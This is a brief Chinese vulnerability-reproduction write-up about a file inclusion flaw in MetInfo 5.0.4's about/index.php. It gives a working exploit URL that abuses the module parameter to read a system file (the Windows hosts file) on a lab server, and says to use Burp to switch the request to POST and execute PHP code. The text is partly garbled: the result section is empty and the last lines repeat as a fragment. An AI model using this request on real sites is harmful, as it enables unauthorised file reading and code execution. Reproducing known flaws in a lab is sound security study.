[漏洞復現] MetInfo5.0.4文件包含漏洞
MetInfo5.0.4
漏洞代碼審計
漏洞出現在about/index.php中,因為利用了動態地址,所以存在漏洞。
漏洞檢查語句(!192.168.109.100是我的服務器ip,需要換成自己的):
http://192.168.109.100/MetInfo5.0.4/about/index.php?module=c:/windows/system32/drivers/etc/hosts&fmodule=7
結果:
漏洞利用
可以使用burp工具對漏洞進行利用
把GET模式改為POST,執行PHP代碼
行利用
把GET模式改為POST,執行PHP代碼